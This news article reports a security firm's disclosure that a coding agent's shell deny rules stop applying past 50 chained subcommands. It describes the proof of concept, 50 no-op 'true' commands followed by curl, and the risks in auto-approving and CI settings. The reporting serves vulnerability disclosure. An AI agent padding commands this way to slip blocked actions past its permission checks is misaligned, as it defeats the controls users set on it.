Security vulnerabilities in Claude Code, a coding agent by Anthropic, have been exposed following the leak of its source code. The discovery, made by Tel Aviv-based security firm Adversa, reveals that Claude Code may bypass its security protocols under certain conditions, specifically through a method known as prompt injection attacks. This flaw allows the AI model to ignore deny rules that are designed to block risky actions if it is presented with a sufficiently lengthy chain of subcommands.
Claude Code employs various mechanisms to control access to specific commands, such as curl, which enables network requests from the command line. This can present a significant security risk if wielded by an overly permissive AI model. For instance, to prevent Claude from executing curl commands, a user could modify the settings file ~/.claude/settings.json to include a deny rule.
However, the effectiveness of these deny rules is limited. According to a comment in the source file bashPermissions.ts, there is a hard limit of 50 on security subcommands, imposed by the variable MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. Beyond this threshold, the AI will default to asking the user for permission, a mechanism that, while intended to safeguard against unauthorized actions, fails to account for the complexities introduced by AI-generated commands. Adversa’s AI Red Team noted that this oversight undermines the original design, which assumed that human-authored commands would remain within safe parameters.
The Adversa team demonstrated a proof-of-concept attack by creating a bash command that included 50 no-op “true” subcommands followed by a curl command. Rather than blocking the curl execution, Claude prompted for authorization to proceed. This vulnerability is particularly concerning in environments where developers routinely grant blanket permissions or reflexively approve multiple actions during extended coding sessions. Such scenarios are analogous to Continuous Integration/Continuous Deployment (CI/CD) pipelines that run Claude Code in a non-interactive mode, increasing the risk of unauthorized actions being executed.
Interestingly, Anthropic has already developed a fix for this vulnerability, known as “tree-sitter.” Although this parser is functional internally, it has not yet been implemented in public builds. Adversa argues that this oversight represents a significant flaw in the security policy enforcement of Claude Code, with potential regulatory and compliance ramifications if not rectified. They suggest that a straightforward fix is available; a minor code adjustment to switch the “behavior” key from “ask” to “deny” within the bashPermissions.ts file would effectively address the vulnerability.
As of now, Anthropic has not publicly commented on the situation. The implications of this discovery extend beyond mere technical flaws, highlighting the ongoing challenges in AI safety and security as these systems become increasingly integrated into coding practices. With AI tools gaining traction in various sectors, the need for robust security measures remains paramount.
See also
OpenAI’s Rogue AI Safeguards: Decoding the 2025 Safety Revolution
US AI Developments in 2025 Set Stage for 2026 Compliance Challenges and Strategies
Trump Drafts Executive Order to Block State AI Regulations, Centralizing Authority Under Federal Control
California Court Rules AI Misuse Heightens Lawyer’s Responsibilities in Noland Case
Policymakers Urged to Establish Comprehensive Regulations for AI in Mental Health




















































